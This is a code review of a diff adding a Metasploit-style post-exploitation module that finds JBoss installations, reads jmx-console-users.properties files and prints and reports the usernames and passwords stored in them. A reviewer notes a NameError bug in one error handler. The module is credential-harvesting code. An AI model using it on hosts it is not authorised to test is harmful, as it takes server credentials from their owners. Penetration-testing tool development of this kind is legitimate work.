modules/post/multi/gather/jboss_gather.rb

```diff
@@ -0,0 +1,317 @@
+          creds = line.split("=")
+          print_good("Credentials found - Username: #{creds[0]} Password: #{creds[1]}")
+          report_creds(creds[0], creds[1], ports[i])
+        end
+      end
+      i+=1
+    end
+  end
+
+  def getversion(array)
+    i = 0
+    version = "NONE"
+    results = []
+    while i < array.count
+      downcase = array[i].downcase
+      if downcase.include? "jboss"
+        begin
+          file = read_file(array[i])
+        rescue
+          print_error("Cannot open #{array[i]}, you probably don't have permissions to open the file.")
+          next
+        end
+        xml_doc = Nokogiri::XML(file)
+        xml_doc.xpath("//jar-versions//jar").each do |node|
+          if node["name"] == "jbossweb.jar"
+            version = node["specVersion"][0]
+            results.push(version)
+          end
+        end
+      end
+      if not version == "NONE"
+        print_status("Found a Jboss installation version: #{version}")
+        home = readhome(cmd_exec('printenv').split("\n"))
+        pwfiles = getpwfiles(cmd_exec('locate jmx-console-users.properties').split("\n"), home, version)
+        listenports = getports(version)
+        getpw(pwfiles,listenports)
+      end
+      i+=1
+    end
+  end
+
+  def wingetversion(array, home)
+    i = 0
+    version = "NONE"
+    results = []
+    while i < array.count
+      downcase = array[i].downcase
+      if downcase.include? "jboss"
+        file = read_file(array[i])
+        xml_doc = Nokogiri::XML(file)
+        xml_doc.xpath("//jar-versions//jar").each do |node|
+          if node["name"] == "jbossweb.jar"
+            version = node["specVersion"][0]
+            results.push(version)
+          end
+        end
+      end
+      if not version == "NONE"
+        print_status("Found a Jboss installation version: #{version}")
+        instances = wingetinstances(home,version)
+        pwfiles = winpwfiles(instances)
+        listenports = wingetport(instances)
+        getpw(pwfiles,listenports)
+      end
+      i+=1
+    end
+  end
+
+  def readhome(array)
+    home = ""
+    array.each do |item|
+      if item.include? "JBOSS_HOME"
+        home = item.split("JBOSS_HOME=")[1]
+      end
+    end
+    return home
+  end
+
+  def getpwfiles(array, home, version)
+    pwfiles = []
+    array.each do |location|
+      if location.include? (home and version)
+        pwfiles.push(location)
+      end
+    end
+    return pwfiles
+  end
+
+  def getports(version)
+    type1 = cmd_exec('locate bindings-jboss-beans.xml').split("\n")
+    type2 = cmd_exec('locate jboss-web.deployer/server.xml').split("\n")
+    port = []
+
+    type1.each do |file1|
+      if file1 and file1.include? version
+        print_status("Attempting to extract Jboss service ports from: #{file1}")
+        begin
+          file1_read = read_file(file1).split("\n")
+        rescue
+          print_error("Cannot open #{array[i]}, you probably don't have permissions to open the file.")
```

Comment:
believe this should be `file1` not `array`.

My run breaks here and throws a NameError undefined local variable or method `array` on this line.